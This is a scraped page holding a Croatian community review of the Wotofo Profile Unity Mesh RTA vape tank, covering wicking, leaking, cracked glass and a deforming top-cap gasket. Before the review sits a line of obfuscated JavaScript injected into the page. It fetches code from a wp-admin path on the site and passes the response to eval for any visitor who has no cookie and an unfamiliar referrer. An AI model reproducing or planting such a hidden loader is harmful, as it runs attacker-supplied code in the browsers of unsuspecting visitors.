;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
WOTOFO PROFILE UNITY MESH RTA

Wotofo Profile Unity Mesh RTA

Wotofo Profile Unity Mesh RTA recenzija by Joško

WOTOFO PROFILE UNITY
WOTOFO PROFILE UNITY

Imam ih dva. Ako volite glavobolju oko wickanja onda je to atty za vas.

Sam mesh se postavi vrlo jednostavno. Ali onda dolazi dio sa pamukom. Bilo bi stvarno poželjno slijediti upute dobivene uz atty ili pogledati nekoliko recenzija na YouTube.

Pamuk se reže pod kutom i mora se pogoditi odgovarajuća količina i visina vate jer u protivnom će curiti na airflow, a to pretpostavljam sve živcira. Ali jednom kad pogodite dobar omjer pamuka, da ga nema previše i da dobro zatvara rupe od airflowa da ne curi istim će te biti vise nego zadovoljni. 

WOTOFO PROFILE UNITY
WOTOFO PROFILE UNITY

Jednostavno se otvara top cap za naliti e tekućinu. To je plus. Aroma perfektna. Moje iskustvo je takvo da odmah zamijenite manje staklo većim (ima u paketu dodatak za veće staklo) jer su mi oba manja stakla neobjašnjivo pukla bez da je tank padao. 

Wotofo Profile Unity ima još jednu manu, ali i savjet kako riješiti.

Na top capu je gumica. Ta gumica se zna izdeformirati kod korištenja citrusnih aroma. Ukoliko vam se to desi izvadite gumicu, dobro je isperite u mlakoj vodi i ostavite da se sama po sebi dobro osuši. Nakon sto se osuši uredno je vratite na njeno mjesto i atty je u jednakoj funkciji kao i prije. 

Zaključak

Plus: top fill, perfektna aroma, jednostavna montaža mesh mrežice, dobro podesiv airflow

Minus: malo kompliciranije wickanje, te mogućnost curenja kao i kod svih tankova sa bottom airflowom. Deformacija glumice na top capu kod citrusnih aroma (to će te osjetit na način da se top cap ne skida i vraća glatko). 

U svakom slučaju preporuke za dobar dl mesh tank. 

Joško Jaman


Ovo je review člana Vaper Pub zajednice! Napišite i vi review te ga pošaljite na admin@vaper-pub.com, ukoliko je dobar i ukoliko ga objavimo bit ćete nagrađeni Puff bodovima!

Vidimo se petkom u live streamu na Vaper Pub Youtube kanalu.

Choose your Reaction!
Leave a Comment